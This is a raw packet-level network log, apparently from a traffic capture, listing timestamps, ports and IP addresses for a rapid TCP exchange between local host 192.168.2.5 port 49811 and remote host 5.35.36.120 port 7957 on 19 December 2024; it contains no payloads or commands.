Dec 19, 2024 09:29:58.827894926 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.829783916 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.829838991 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.829891920 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.831710100 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.831922054 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.831975937 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.833825111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.833945990 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.834000111 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.835856915 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.835999966 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.836050987 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.837738037 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.837845087 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.838443995 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.925062895 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.925209999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.925266027 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.925657034 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.925767899 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.925823927 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.927203894 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.927239895 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.927295923 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.928639889 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.928785086 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.928847075 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.930171967 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.930283070 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.930344105 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.931646109 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.931761980 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.933185101 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.933250904 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.933288097 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.934686899 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.934722900 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.934753895 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.935980082 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.936022997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.936139107 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.936764002 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.937458992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.937621117 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.937690020 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.938868046 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.938999891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.939068079 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.940279007 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.940403938 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.940459013 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.941709995 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.941764116 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.941833019 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.943150997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.943205118 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.943259001 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.944396973 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.944519043 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.944570065 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.945868015 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.945903063 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.946435928 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.947213888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.947248936 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.947297096 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.948519945 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.948642969 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.948697090 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.949759007 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.949867010 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.949914932 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.951164961 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.951374054 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.951433897 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.952377081 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.952508926 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.952564001 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.953664064 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.953783035 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.953839064 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.955023050 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.955090046 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.955135107 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.956274033 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.956383944 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.956433058 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.957539082 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.957725048 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.957775116 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.958805084 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.958859921 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.960074902 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.960108042 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.961335897 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.961373091 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.961396933 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.961409092 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.961457968 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.962611914 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.962785006 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.962861061 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.963800907 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.963973045 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.964071035 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.965138912 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.965173960 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.965233088 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.966341019 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.967387915 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.967451096 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.967614889 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.968841076 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.968888998 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.968914032 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.968924046 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.968974113 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.970185995 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.970221996 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.970274925 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.971334934 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.972554922 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.972589970 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.972609997 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.972661972 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.972712994 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.974106073 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.974140882 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.974196911 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.975343943 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.975356102 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.975400925 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.976866007 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.976878881 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.976939917 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.977705956 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.977804899 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.977847099 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.978862047 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.978970051 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.979042053 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.980217934 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.980317116 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.980360031 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.981498957 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.981517076 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.981566906 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.982572079 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.982731104 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.982783079 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.983810902 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.983890057 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.983937979 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.985116005 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.985163927 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.985224009 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.986268997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.986413956 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.986459017 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.987658978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.987669945 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.987708092 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.988795996 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.988903999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.989054918 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.990268946 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.990461111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.990511894 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.991369009 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.991472960 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.991523027 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.992583036 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.992629051 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:58.992676020 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:58.993808985 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.034811974 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.116920948 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.116997957 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.117235899 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.117403984 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.117558956 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.117615938 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.118432999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.118534088 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.118582010 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.119429111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.119551897 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.119601965 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.120444059 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.120563030 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.120614052 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.121489048 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.121577978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.121627092 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.122507095 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.122608900 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.123212099 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.123493910 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.123572111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.123619080 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.124552965 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.124664068 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.124761105 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.125663996 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.125783920 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.125838041 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.126569033 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.126698971 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.126754045 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.127595901 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.127729893 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.127782106 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.128613949 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.128730059 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.128781080 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.129667044 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.129703999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.130276918 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.130642891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.130794048 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.130840063 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.131710052 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.131839037 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.131985903 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.132858038 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.132911921 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.132966995 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.133769989 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.133867025 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.133919001 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.134768963 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.134879112 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.134927988 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.135796070 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.135904074 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.136003017 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.136794090 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.136926889 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.136974096 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.137828112 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.137963057 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.138111115 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.138844967 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.138967991 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.139019012 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.139877081 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.140005112 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.140058041 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.140893936 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.141027927 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.141078949 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.141926050 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.142085075 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.142134905 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.142973900 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.143069983 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.143547058 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.143961906 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.144093990 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.144145012 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.145028114 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.145154953 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.145255089 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.146001101 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.146122932 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.146187067 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.147202015 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.147356987 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.147408962 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.148164034 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.148260117 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.148310900 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.149065971 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.149215937 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.149266005 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.150149107 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.150418043 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.150782108 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.151107073 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.151216030 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.151257992 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.152127028 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.152219057 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.152264118 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.153135061 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.153276920 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.153318882 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.154158115 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.154242039 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.154293060 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.155174017 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.155307055 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.155364037 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.156208992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.156255007 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.156299114 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.157274961 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.157335997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.157377958 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.158245087 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.158358097 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.158409119 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.159377098 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.159459114 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.159502029 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.160531044 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.160619020 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.160665989 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.161315918 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.161426067 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.161468983 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.162374020 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.162467003 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.162508965 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.163754940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.163830996 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.164388895 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.165052891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.165163994 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.165204048 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.166124105 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.166191101 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.166235924 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.166914940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.167004108 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.167057037 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.167550087 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.167649031 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.167701006 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:29:59.168452978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.168612003 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:29:59.168658018 CET	49811	7957	192.168.2.5	5.35.36.120
